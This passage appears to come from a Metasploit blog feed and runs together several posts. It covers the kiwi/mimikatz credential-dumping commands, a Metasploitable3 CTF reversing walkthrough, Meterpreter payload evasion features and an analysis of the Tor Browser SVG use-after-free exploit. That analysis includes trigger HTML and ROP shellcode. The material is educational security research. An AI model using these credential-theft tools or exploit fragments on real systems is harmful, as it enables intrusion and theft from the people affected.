   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888

 

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

 

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

 

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands
=============

    Command                Description
    -------                -----------

    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

 

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

 

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

king.jpgMetasploitable3 is a free virtual machine that we have recently created to allow people to simulate attacks using Metasploit. In it, we have planted multiple flags throughout the whole system; they are basically collectable poker card images of some of the Rapid7/Metasploit developers. Some are straight-forward and easy to open, some are hidden, or obfuscated, etc. Today, we would like to share the secret to unlocking one of these cards: the King of Clubs.

 

The King of Clubs is one of the fun flags to extract. This card can be found in the C:\Windows\System32 directory, and it's an executable. To retrieve it, you will need to compromise the host first. In this demonstration, we will SSH into the host. And when calling the King of Clubs executable, we are greeted with the following riddle:

 

Screen Shot 2016-12-06 at 12.11.42 AM.png

 

Binary Analysis

 

Obviously, this executable requires a closer examination. So ideally, you want to download this binary somewhere to your favorite development/reversing environment:

 

Screen Shot 2016-12-06 at 12.14.08 AM.png

 

If you attempt to look at the executable with a debugger, you will notice that the binary is packed, which makes it difficult to read. There are multiple ways to figure out what packer is used for the executable. Either you will most likely discover it by inspecting the PE structure, which contains multiple UPX sections. Or you can use PEiD to tell you:

 

Screen Shot 2016-12-05 at 2.43.15 PM.png

 

UPX is a binary compression tool that is commonly used by malware to make reverse engineering a little bit more difficult. It is so common you can find an unpacker pretty easily, as well. In this example, we are using PE Explorer because it's free. PE Explore will automatically recognize our binary is packed with UPX, and unpack it. So all you have to do is open the binary with it and click save:

 

Screen Shot 2016-12-05 at 2.45.31 PM.png

 

There, that wasn't too painful. Was it?

 

At this point, we are ready to read the binary with a disassembler. Let's start with the main function:

 

Screen Shot 2016-12-05 at 2.49.20 PM.png

 

As we can see, the first thing the program does is checking if there is a debugger attached or not. If there it, then the program exits:

 

Screen Shot 2016-12-05 at 2.49.00 PM.png

 

If you are doing dynamic analysis, don't forget to disable this :-)

 

The next thing it does is checking if the current user is "hdmoore" or not. If yes, then it writes a card to disk. If not, it prints out the riddle that we saw previously:

 

Screen Shot 2016-12-05 at 2.49.00 PM copy.png

 

Let's look at how the card is created a little more. First off, we see that the constructor of the Card class initializes something with the value 0x0f, this piece of information is important for later:

 

Screen Shot 2016-12-05 at 3.06.09 PM.png

 

After the initialization, our main function calls the writeCard function.

 

The writeCard function does two things. First, it iterates through a big chunk of data of 76473h bytes, XORing each byte. If you pay attention to where EAX comes from, which is [EBP+ARG_0], you should remember that it's the value the Card class initialized. So this means, the writeCard function is XORing a big chunk of data with 0x0F:

 

Screen Shot 2016-12-05 at 3.08.59 PM.png

 

After the function is done XORing, it's ready to write the data to disk using ofstream. The first argument of ofstream's open function reveals that we are trying to write a file named "king_of_clubs.png":

 

Screen Shot 2016-12-05 at 3.12.39 PM.png

 

After the file is written, we are at the end of the function, and that leads us to the end of the program.

 

Ways to Extraction

 

Now that we understand how the program works, we have some options to extract the XOR'd image from the binary

 

  • Since IDA already tells us where the XOR'd PNG data is at, we can extract 76474h bytes, and then XOR back the data with 0x0f.
  • Bypass the IsDebuggerPresent call with OllyDBG, and modify the JNZ jump for strcmp, which will force the program to always produce the card.
  • This is probably the easier one: Create a user named "hdmoore", run the program again:

 

Screen Shot 2016-12-06 at 12.32.50 AM.png

 

And that's how you reverse engineer the challenge. Now, go ahead and give this a try, and see who the King of Clubs is. If you like this challenge, don't feel shy to try the other 14 Metasploitable3 flags as well :-)

 

If you haven't tried Metasploitable3 but finally want to get your hands dirty, you can get it here. Keep in mind that Metasploitable3 is a vulnerable image that's heavily exploitable by Metasploit, so if you don't have Metasploit, you should download that and put it in your tool box :-)

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

 

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

 

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

 

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager

 

On the second day of Haxmas, Tim gave us two Android Services

 

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose a your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

 

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now setup a locally-visible service via a Meterpreter session that visible to your target users. This is a nice complement to standard port forwarding that has been available with Meterpreter sessions for some time.

 

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'.  Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your your choosing.

 

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system.

 

This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to confortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capaibilites built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017.

 

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But, getting data from applications can be trickier. Many Android applications use SQLite for data storage however, and armed with the combination of a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

 

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

 

On the eight day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

 

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash.

 

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

 

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpr eters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well it works as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

 

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealty operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.

 

Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!


The Metasploitable3 CTF competition has wrapped up and we have our winners!  We had almost 300 flag submissions from more than 50 fine folks.  There were some really great right-ups submitted with great details on how flags were found.  Thanks to everyone who took time to submit a finding!  ON TO THE RESULTS!

 

When we announced the competition, we didn't specify if team submissions were allowed or not.  Well, it turns out that  a team was in the top 3.  Team RUNESEC went bonkers and submitted all 15 flags over the course of 4 days.  Nice work RUNESEC.   We didn't want anyone to feel slighted so we decided to go ahead and (in the spirit of the season) be generous .   Therefore, Team RUNESEC will receive a 2nd place prize as they were second to submit all the flags.  Additionally, the Top-3 individual submitters will receive prizes.

 

These winners showed some tremendous talent and skill.  Vaibhav completed just 7 days after the contest was announced and Jonathan completed all the flags in roughly 12 hours!  A total of 4 individuals completed the challenge, based on reviews of the write-ups, and time of completion we have the top 3 winners.

 

Top Individual Submitters

1st Place, Hak5 Pineapple: Vaibhav Deshmukh

2nd Place, LAN Turtle or Lock Pick Set: Igor Guarisma

3rd Place, LAN Turtle or Lock Pick Set: Jonathan Echavarria

 

Top Team Submitter

1st Place, LAN Turtle or Lock Pick Set: Team RUNESEC

 

Here is a break down of the top-10 submitters, please note that the grouping by count doesn't reflect overall standings, just the number of valid flags submitted.

 

Top 10 Submitters

2016-12-29_15-59-36.png

 

Great work everyone!

 

The card most frequently found where:

2016-12-29_15-28-56.png

 

The card most likely to be found first?  The Joker.

 

yougeta.gif

We will be contacting the winners directly over the next few weeks to arrange delivery of the prizes.  And... as an added bonus EVERYONE who submitted a valid flag will get a Metasploit t-shirt!!

 

Thanks again to everyone who participated, we've had a great time reviewing all the very creative and well-written submissions.  Going forward we will continue to add new and fun flags to Metasploitable3 as always, we'll keep you posted when we have some new flags to discover.  We will also be adding new options to exploit Metasploitable3 as they emerge.   If you have any ideas or things you'd like to see in future iterations of Metasploitable3 please feel free to comment on our Git page.  Metasploitable3 is an open source project so, if you're up to it, you can submit a pull request with any of your own ideas!  Check out the repo on git.

 

I'd like to give a special thanks to sinn3r for all of his great work judging submissions and helping out everyone with questions.

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Breaking Records and Breaking Business

2016 brought plenty of turmoil, and InfoSec was no exception:

  • Largest data breach: Largest breach ever, affecting more than 1 billion Yahoo users. And they were not alone: Oracle, LinkedIn, the Department of Justice, SnapChat, Verizon, DropBox, the IRS --- many organizations experienced, or discovered (or finally revealed the true extent of...), massive breaches this year.
  • Record-breaking denial of service attacks: law enforcement efforts targeting DDoS-as-a-Service providers are encouraging, but Mirai achieved record-breaking DDoS attacks this year. It turns out those easy-to-take-for-granted devices joining the Internet of Things in droves can pack quite a punch.
  • Ransomware: the end of 2015 saw a meteoritic rise in the prevalence of ransomware, and this continued in 2016. Healthcare and other targeted industries have faced 2-4x as many related attacks this year, some via increased coverage of ransomware in exploits kits, but mostly through plain old phishing.

 

Businesses and individuals continue to face new and increasing threats in keeping their essential systems and data secure. A static defense will not suffice: they must increase in both awareness and capability regularly in order to form a robust security program.

 

Metasploit Framework has grown in many ways during 2016, both through the broader community and through Rapid7 support. Let's look back through some of the highlights:

 

More exploits

A surprisingly wide range of exploits were added to Metasploit Framework in 2016:

  • Network management: NetGear, OpenNMS, webNMS, Dell, and more
  • Monitoring and backup: Nagios XI, Exagrid
  • Security: ClamAV, TrendMicro, Panda, Hak5 Pineapple, Dell SonicWall, Symantec -- and Metasploit itself!
  • Mainframes, SCADA dashboards
  • Exploit Kits: Dark Comet, Phoenix
  • ExtraBACON; StageFright
  • Content management/web applications: Joomla, TikiWiki, Ruby on Rails, Drupal, Wordpress forms
  • Docker, Linux kernel, SugarCRM, Oracle test suite, Apache Struts, exim, Postgres, and many more!

 

More flexibility

Metasploit Framework provides many supporting tools, aside from those designed to get a session on a target. These help in collecting information from a wide variety of systems, staying resilient to unknown and changing network environments, and looking like you belong.

 

Some expansions to the toolbox in 2016 included:

 

By the Numbers

Nearly 400 people have contributed code to Metasploit Framework during its history. And speaking of history: Metasploit Framework turned 13 this year! Long long ago, in a console (probably not too) far away:

msf-2.2.png

Metasploit Framework 2.2 - 30 exploits

 

Has much changed in the last 12 years? Indeed!

msf-4.13.8.png

Metasploit Framework 4.13.8 - 1607 exploits

 

In 2016, Metasploit contributors added over 150 new modules. Metasploit Framework's growth is powered by Rapid7, and especially by the community of users that give back by helping the project in a variety of ways, from landing pull requests to finding flags.

 

Topping the list of code contributors in 2016: Wei Chen (sinn3r), Brent Cook, William Vu (wvu), Dave Maloney (thelightcosine), h00die, OJ Reeves, nixawk, James Lee (egypt), Jon Hart, Tim Wright, Brendan Watters, Adam Cammack, Pedro Ribeiro, Josh Hale (sn0wfa11), and Nate Caroe (TheNaterz).

 

The Metasploit Framework GitHub project is approaching 4700 forks, and ranks in the top 10 for Ruby projects once again. It's also the second most starred security project on GitHub. None of this would have been possible if not for the dedication and drive of the Metasploit community. Together, we can continue to highlight flaws in existing systems, and better test the essential software of tomorrow. John Locke voiced in 1693 what open source security supporters continue to know well today: "The only fence against the world is a thorough knowledge of it."

 

So what about you?

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

exploit_dev.png

 

Towards the end of November, the Tor community was shaken up by the revelation of an previously unknown vulnerability being actively exploited against pedo^H^H^H^H Tor Browser users. Some further drama unfolded regarding who the source for the exploit may be, and I received questions from several reporters who wanted every single detail I could give them. While I did not participate in commenting at the time, I'll say everything I will ever say about it now:

 

- Yes, I'm aware of a very similar exploit which targeted Firefox

- No, I didn't write it

 

Largely lost among all the noise are the nuances of the vulnerability and the exploit itself, which I know the author put his heart and soul into. If anonymous entrants are ever retroactively awarded Pwnies, I'd like to put his unsaid name into the hat. In this part of the 12 Days of HaXmas, I wanted to offer a high level overview to some of the more interesting parts of both the vulnerability--which in my opinion doesn't fit cleanly into any classic category--and the exploit. I'm not going to dive into all of the gory details for a couple of reasons. Firstly, timing. Had this been leaked earlier in the year, I might have been able to do the analysis part some justice. Second, while verbose technical expositions certainly have their place, a blog is not the right spot. The content might take take another 12 days to cover, and for those seeking to learn from it, I feel your own analysis of the exploit coupled with lots of dirty work in a debugger would be your best option. In that case, hopefully this can offer you some direction along the way.

 

The Discovery

 

It would be remiss of me if I didn't begin by pointing out that no fuzzer was used in the discovery of this vulnerability. The only tools employed were the Woboq Code Browser (Woboq Code Browser - Explore C++ code on the web), WinDBG, a sharp mind, and exhaustive effort. The era of low-hanging fruit is largely over in my opinion. Don't be the gorilla, be the lemur, climb that tree.

 

The Vulnerability

 

In the following snippet from nsSMILTimeContainer.cpp, the pointer p is initialized to the beginning of the mMilestoneEntries array.

 

void
nsSMILTimeContainer::NotifyTimeChange()
{
  // Called when the container time is changed with respect to the document
  // time. When this happens time dependencies in other time containers need to
  // re-resolve their times because begin and end times are stored in container
  // time.
  //
  // To get the list of timed elements with dependencies we simply re-use the
  // milestone elements. This is because any timed element with dependents and
  // with significant transitions yet to fire should have their next milestone
  // registered. Other timed elements don't matter.
  const MilestoneEntry* p = mMilestoneEntries.Elements();
#if DEBUG
  uint32_t queueLength = mMilestoneEntries.Length();
#endif
  while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) {
    mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get();
    elem->TimedElement().HandleContainerTimeChange();
    MOZ_ASSERT(queueLength == mMilestoneEntries.Length(),
               "Call to HandleContainerTimeChange resulted in a change to the "
               "queue of milestones");
    ++p;
  }
}

 

Now, consider the following two examples:

 

Exhibit One

<html>
<head>
  <title>
  Exhibit One
  </title>
</head>
<body>
    <svg id='foo'>
        <animate id='A' begin='1s' end='10s' />
        <animate begin='A.end + 5s' dur='15s' />
    </svg>
</body>
</html>

 

Exhibit Two

<html>
<head>
  <title>
  Exhibit Two
  </title>
</head>
<body>
    <svg id='foo'>
        <animate id='A' begin='1s' end='10s' />
    </svg>
    <svg id='bar'>
        <animate begin='A.end + 5s' dur='15s' /> 
    </svg>
</body>
</html>

 

In these examples, for each <svg> element that uses <animate>, an nsSMILTimeContainer object is assigned to it in order to perform time book keeping for the animations (<animateTransform> or <animateMotion> will also have the same behavior).  The epoch of each container is the time since the creation of the <svg> element it is assigned to relative to the creation of the page.  The nsSMILTimeContainer organizes each singular event in an animation with an entry for each in the mMilestoneEntries member array. See: nsSMILTimeContainer.h - DXR

 

In Exhibit One, the mMilestoneEntries array will contain four entries: one for both the beginning and ending of 'A', in addition to another two, one being relative to A's completion (A.end + 5s), and the other demarcating the end of the animation, in this case 30 seconds (A.end + 5s + 15s).

 

In Exhibit Two we see two independent <svg> elements.  In this example, two separate nsSMILTimeContainer objects will be created, each of course having it's own mMilestoneEntries array.

 

The exploit makes a single call to the function pauseAnimation(), which in turn triggers entry into the NotifyTimeChange() method.  nsSMILTimeContainer::NotifyTimeChange() proceeds to iterate through all entries in the mMilestoneEntries array, retrieving each individual entries nsSMILTimedElement object, after which it calls the object's HandleContainerTimeChange() method.  After some time, this method will end up making a call to the NotifyChangedInterval() method of of the nsSMILTimedElement object.  In NotifyChangedInterval(), HandleChangedInterval() will be entered if the animation being processed has a milestone relative to another animation.  In Exhibit Two, bar's beginning is relative to the element A belonging to foo, so HandleChangedInterval() will be called.

 

Within HandleChangedInterval(), a call to nsSMILTimeValueSpec::HandleChangedInstanceTime() will inevitably be made.  This method determines if the current animation element and the one it has a dependency on are contained within the same nsSMILTimeContainer object.  If so, as is the case with Exibit One, the pauseAnimations() function basically lives up to it's name and pauses them.  In Exhibit Two, the animations do not share the same nsSMILTimeContainer object, so additional bookkeeping is required in order to maintain synchronization.  This occurs, with subsequent calls to nsSMILTimedElement::UpdateInstanceTime() and nsSMILTimedElement::UpdateCurrentInterval() being made, and nothing too interesting is to be seen, though we will be revisiting it very shortly.

 

Deeper down the rabbit hole ...

 

What about the case of three or more animation elements with relative dependencies? Looking at the exploit, we see four animations split unequally among two containers.  We can modify Exhibit Two using details gleaned from the exploit to arrive at the following example.

 

Exhibit Three

<html>
<head>
  <title>
  Exhibit Three
  </title>
</head>
<body>
  <script>
     var foo = document.getElementById('foo');
     foo.pauseAnimations();
  </script>
    <svg id='foo'>
        <animate id='A' begin='1s' end='5s' />
        <animate id='B' begin='10s' end='C.end' dur='5s' />
    </svg>
    <svg id='bar'>
        <animate id='C' begin='0s' end='A.end/> 
    </svg>
</body>
</html>

 

In this example, C's ending is relative to A's end, so we end up in nsSMILTimedElement::UpdateCurrentInterval() again, except that a different branch is followed based on the example's milestones:

 

if (mElementState == STATE_ACTIVE) {
  // The interval is active so we can't just delete it, instead trim it so
  // that begin==end.
  if (!mCurrentInterval->End()->SameTimeAndBase(*mCurrentInterval->Begin()))
  {
    mCurrentInterval->SetEnd(*mCurrentInterval->Begin());
    NotifyChangedInterval(mCurrentInterval, false, true);
  }
  // The transition to the postactive state will take place on the next
  // sample (along with firing end events, clearing intervals etc.)
  RegisterMilestone();

 

NotifyChangedInterval() is called to resolve any milestones relative to other animations for C.  Within foo, B has milestones relative to C in bar.  This results in a recursive branch along the same code path which ultimately hits UpdateCurrentInterval(), which in turn sets the state of the nsSMILTimedElement.  mElementState can be one of four possible values:

 

  • STATE_STARTUP
  • STATE_WAITING
  • STATE_ACTIVE
  • STATE_POSTACTIVE

 

all of which perfectly describes their own respective meanings.  In Exhibit Three, B's beginning is set to occur after it's ending is set (C.end == A.end == 5s).  Since it will never start, the code marks it as STATUS_POSTACTIVE.  This results in the following code within the UpdateCurrentInterval() method creating a new interval and setting it as current.

 

if (GetNextInterval(GetPreviousInterval(), mCurrentInterval,
                    beginTime, updatedInterval)) {

  if (mElementState == STATE_POSTACTIVE) {

    MOZ_ASSERT(!mCurrentInterval,
               "In postactive state but the interval has been set");
    mCurrentInterval = new nsSMILInterval(updatedInterval);
    mElementState = STATE_WAITING;
    NotifyNewInterval();
  }

 

With this occurring, UpdateCurrentInterval() now makes a call to the RegisterMilestone() method.  This was not the case in Exhibit Two.  With a new interval having been created, the method will add a new entry in the mMilestoneEntries array of containerA's nsSMILTimeContainer object, resulting in the array being freed and reallocated elsewhere, leaving the pointer p from nsSMILTimeContainer::NotifyTimeChange() referencing invalid memory.

 

Exploitation Overview

 

Just because the pointer p in NotifyTimeChange() can be forced to point to free memory doesn't mean it's all over.  Firefox overwrites freed memory with 0x5a5a5a5a, which effectively mitigates a lot of classic UaF scenarios.  Secondly, there is no way to allocate memory in the freed region after the milestone array is relocated.  Given these conditions, it's becoming clear that the vulnerability cannot be exploited like a classic use-after-free bug.  If you forced me to categorize it and come up with a new buzz word as people are so apt to in this industry, I might call it a dangling index, or an iterator run-off.  Regardless of silly names, the exploit utilizes some artful trickery to overcome the hurdles inherent in the vulnerability.  As I mentioned at the offset, for the sake of brevity, I'm going to be glossing over a lot of the details with regards to heap determinism (the terms "heap grooming" and "heap massaging" irritate me more than the word "moist").

 

In the first step, the exploit defragments the heap by spraying 0x80 byte blocks of ArrayBuffers, and another 0x80 of milestone arrays.  Each of the milestone arrays is filled to capacity, and then one additional element is added to each.  This causes the arrays to be reallocated elsewhere, leaving 0x80 holes.  After filling these holes with vulnerable milestone arrays, assuming the <b>last element</b> of the array is the one that triggers the vulnerability, there is now a high probability that the next iteration of the NotifyTimeChange() loop will point within one of the 0x80 ArrayBuffer's that were allocated first.  It is important that the last element be the one to trigger the bug, as otherwise, the memory would be freed and overwritten before an attacker could take advantage of it.

 

The next obstacle in the process is bypassing the object reference count which, under normal circumstances, would cause the loop to exit.  Even if this were a full technical exposition, I'd leave this part as an exercise to the reader because of reasons.  I invite you to figure it out on your own, because it's both quite clever and critical to the success of the exploit.  Those pesky reasons though.  Seasoned exploitation engineers will see it quickly, and astute students will have truly learned when they unravel the knot.

 

I'd like to think that this is a good hint, but the only certainty is that it comes up on my 3 AM debugging session playlist a lot

 

In any case, after the exploit does it's thing, the exit condition of the loop

 

while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) 

 

will never be reached, and instead the loop will continue to iterate infinitely.  While this is great news, it also means that an attacker is unable to continue executing code.  The solution to this is one of the more brilliant aspects of this exploit, that being the use of a Javascript worker thread.

 

  var worker = new Worker('cssbanner.js');

 

With the worker thread, Javascript can continue being executed while the infinite loop within the main thread keeps spinning.  In fact, it's used to keep tabs on a lot of magical heap manipulation happening in the background, and to selectively exit the loop when need be.  From here, the exploit leverages a series of heap corruptions into a r/w primitive, and bypasses ASLR by obtaining the base address of xul.dll from said corruptions by parsing the files DOS header in memory.  This, along with resolving imports, is the main purpose of the PE(b,a) function in the leaked exploit.

 

With ASLR defeated, all that lies ahead is defeating Data Execution Prevention, as the Tor browser doesn't feature any sort of sandbox technology.  The exploit handles this beautifully by implementing an automatic ROP chain generation function, which can locate the addresses of required gadgets amongst multiple versions of Firefox/Tor browser.  After constructing the chain, the following shellcode is appended (I've converted all addresses to base 16 for readability and added comments):

 

ropChain[i++] = 0xc4819090;   // add esp, 800h
ropChain[i++] = 0x0800;
ropChain[i++] = 0x5050c031;   // xor eax, eax ; push eax ; push eax
ropChain[i++] = 0x5b21eb50;   // push eax ; jmp eip+0x23 ; pop ebx
ropChain[i++] = 0xb8505053;   // push ebx ; push eax ; push eax
ropChain[i++] = CreateThread; // mov eax, kernel32!CreateThread
ropChain[i++] = 0xb890d0ff;   // call eax
ropChain[i++] = arrBase + 0x2040;   // mov eax, arrBase+0x2040
ropChain[i++] = 0x5f58208b;   // mov esp, dword ptr [eax] ; pop eax ; pop edi
ropChain[i++] = 0xbe905d58;   // pop eax ; pop ebp
ropChain[i++] = 0xffffff00;   // mov esi, 0xffffff00
ropChain[i++] = 0x000cc2c9;   // ret 0x0c
ropChain[i++] = 0xffffdae8;   // call eip+0x21
ropChain[i++] = 0x909090ff;   // placeholder for payload address

 

The shellcode basically allocates stack space and makes a call to CreateThread with the address of the final payload, which is obtained via the jmp eip+x023 ; pop ebx line, as it's argument.  It next performs stack cleanup and exits the current infinite NotifyTimeChange() loop to ensure clean process continuation.  At least, it's supposed to.  Initial findings I've read from other researchers seem to indicate that it does not continue cleanly when used against Tor browser.  I need to investigate this myself at the first lull in the holiday festivities.

 

"I hope I managed to prove that exploiting buffer overflows should be an art"

                                                                                         - Solar Designer

 

That wraps this up for now. Check back for updates in the future as I continue analysis on it. If you have questions about anything, feel free to ask either here or find me on Twitter @iamwilliamwebb. Happy holidays!

 

 

References

Original leaked exploit: [tor-talk] Javascript exploit

Filter Blog

By date: By tag: